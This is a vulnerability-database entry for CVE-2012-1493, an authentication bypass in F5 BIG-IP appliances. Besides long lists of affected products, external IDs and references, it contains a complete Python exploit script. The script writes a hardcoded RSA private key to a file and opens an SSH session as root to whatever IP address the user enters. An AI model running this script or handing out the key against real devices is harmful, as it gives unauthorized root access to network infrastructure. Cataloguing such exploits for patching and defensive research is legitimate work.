ID
VAR-E-201206-0489
CVE
cve_id: | CVE-2012-1493 | Trust: 2.9 |
EDB ID
19091
TITLE
F5 BIG-IP - Authentication Bypass - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
F5 BIG-IP - Authentication Bypass. CVE-2012-1493CVE-82780 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | f5 | model: | big-ip | scope: | - | version: | - | Trust: 1.0 |
vendor: | f5 | model: | big-ip remote root authentication | scope: | - | version: | - | Trust: 0.5 |
vendor: | f5 | model: | - | scope: | - | version: | - | Trust: 0.5 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 2.3 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 2.2 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 1.4.1 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 2.0 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 1.8 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 1.6 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 1.4 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 1.2 | Trust: 0.3 |
vendor: | f5 | model: | enterprise manager | scope: | eq | version: | 1.0 | Trust: 0.3 |
vendor: | f5 | model: | bigip psm | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip psm | scope: | eq | version: | 10.0.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip psm | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | bigip psm | scope: | eq | version: | 9.4.8 | Trust: 0.3 |
vendor: | f5 | model: | bigip psm | scope: | eq | version: | 9.4.5 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager hf2 | scope: | eq | version: | 10.2.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager | scope: | eq | version: | 10.0.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager | scope: | eq | version: | 9.4.8 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager | scope: | eq | version: | 9.3.5 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager | scope: | eq | version: | 9.1.3 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager | scope: | eq | version: | 9.3.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager | scope: | eq | version: | 9.3 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager | scope: | eq | version: | 9.2 | Trust: 0.3 |
vendor: | f5 | model: | bigip local traffic manager | scope: | eq | version: | 9.0 | Trust: 0.3 |
vendor: | f5 | model: | bigip link controller | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip link controller | scope: | eq | version: | 10.0.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip link controller | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | bigip link controller | scope: | eq | version: | 9.4.8 | Trust: 0.3 |
vendor: | f5 | model: | bigip link controller | scope: | eq | version: | 9.3.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip link controller | scope: | eq | version: | 9.2.5 | Trust: 0.3 |
vendor: | f5 | model: | bigip link controller | scope: | eq | version: | 9.2.2 | Trust: 0.3 |
vendor: | f5 | model: | bigip link controller | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | f5 | model: | bigip link controller | scope: | eq | version: | 9.3 | Trust: 0.3 |
vendor: | f5 | model: | bigip global traffic manager | scope: | eq | version: | 9.4.8 | Trust: 0.3 |
vendor: | f5 | model: | bigip global traffic manager | scope: | eq | version: | 9.3.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip global traffic manager | scope: | eq | version: | 9.2.5 | Trust: 0.3 |
vendor: | f5 | model: | bigip global traffic manager | scope: | eq | version: | 9.2.2 | Trust: 0.3 |
vendor: | f5 | model: | bigip global traffic manager | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | f5 | model: | bigip global traffic manager | scope: | eq | version: | 9.3 | Trust: 0.3 |
vendor: | f5 | model: | bigip application security manager | scope: | eq | version: | 10.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip application security manager | scope: | eq | version: | 10.0.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip application security manager | scope: | eq | version: | 10.0 | Trust: 0.3 |
vendor: | f5 | model: | bigip application security manager | scope: | eq | version: | 9.4.8 | Trust: 0.3 |
vendor: | f5 | model: | bigip application security manager | scope: | eq | version: | 9.3.1 | Trust: 0.3 |
vendor: | f5 | model: | bigip application security manager | scope: | eq | version: | 9.2.5 | Trust: 0.3 |
vendor: | f5 | model: | bigip application security manager | scope: | eq | version: | 9.4 | Trust: 0.3 |
vendor: | f5 | model: | bigip application security manager | scope: | eq | version: | 9.3 | Trust: 0.3 |
vendor: | f5 | model: | bigip application security manager | scope: | eq | version: | 9.2 | Trust: 0.3 |
vendor: | f5 | model: | bigip apm | scope: | eq | version: | 10.1 | Trust: 0.3 |
EXPLOIT
#!/usr/bin/python
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.secmaniac.com
#
#
import subprocess,os
filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
filewrite.close()
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
ipaddr=raw_input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
if os.path.isfile("priv.key"):
os.remove("priv.key")
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Authentication Bypass
Trust: 1.0
TAGS
tag: | exploit | Trust: 1.0 |
tag: | remote | Trust: 1.0 |
tag: | root | Trust: 1.0 |
tag: | bypass | Trust: 0.5 |
CREDITS
David Kennedy (ReL1K)
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2012-1493 | Trust: 2.9 |
db: | EXPLOIT-DB | id: | 19091 | Trust: 1.6 |
db: | EDBNET | id: | 41331 | Trust: 0.6 |
db: | PACKETSTORM | id: | 113526 | Trust: 0.5 |
db: | PACKETSTORM | id: | 113577 | Trust: 0.5 |
db: | BID | id: | 53897 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2012-1493 | Trust: 2.6 |
url: | https://www.exploit-db.com/exploits/19091/ | Trust: 0.6 |
url: | http://www.f5.com/ | Trust: 0.3 |
url: | https://www.trustmatta.com/advisories/matta-2012-002.txt | Trust: 0.3 |
url: | http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html | Trust: 0.3 |
SOURCES
db: | BID | id: | 53897 |
db: | PACKETSTORM | id: | 113526 |
db: | PACKETSTORM | id: | 113577 |
db: | EXPLOIT-DB | id: | 19091 |
db: | EDBNET | id: | 41331 |
LAST UPDATE DATE
2022-07-27T09:33:02.005000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 53897 | date: | 2015-03-19T09:29:00 |
SOURCES RELEASE DATE
db: | BID | id: | 53897 | date: | 2012-06-08T00:00:00 |
db: | PACKETSTORM | id: | 113526 | date: | 2012-06-12T01:50:33 |
db: | PACKETSTORM | id: | 113577 | date: | 2012-06-12T22:42:02 |
db: | EXPLOIT-DB | id: | 19091 | date: | 2012-06-12T00:00:00 |
db: | EDBNET | id: | 41331 | date: | 2012-06-12T00:00:00 |